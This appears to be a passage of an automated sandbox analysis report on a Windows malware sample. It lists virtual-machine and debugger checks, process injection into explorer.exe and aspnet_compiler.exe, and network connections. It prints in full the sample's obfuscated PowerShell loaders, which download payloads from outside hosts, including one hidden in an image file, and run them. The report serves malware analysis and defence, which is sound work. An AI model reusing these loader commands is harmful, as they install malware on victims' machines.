Source: explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000007.00000003.1734913528.00000000055EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l#
Source: powershell.exe, 00000004.00000002.1767676409.00000000081F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000007.00000003.1734913528.00000000055EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000008.00000002.2071104914.000000000B951000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4'^qemU
Source: explorer.exe, 0000000E.00000000.2000536859.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 0000000E.00000000.2000536859.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 0000000E.00000000.2000536859.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: powershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 0000000E.00000002.2904691070.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00402920 LdrLoadDll,

13_2_00402920

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 20_2_02CA16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,

20_2_02CA16C7

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_027F9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

17_2_027F9247

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 17_2_02791011 GetProcessHeap,RtlFreeHeap,

17_2_02791011

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\icgfugf

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: icgfugf.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 46.173.214.14 80

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_7948.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTR

Creates a thread in another existing process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Thread created: C:\Windows\explorer.exe EIP: 1211960

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 7272 base: 3279C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7788 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7868 base: 3279C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7968 base: 3279C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7912 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7944 base: 3279C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7728 base: 7FF72B812D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 7568 base: 3279C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6100 base: 7FF72B812D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 661008	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		27_2_027910A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		27_2_02791016

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() \| ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() \| foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmv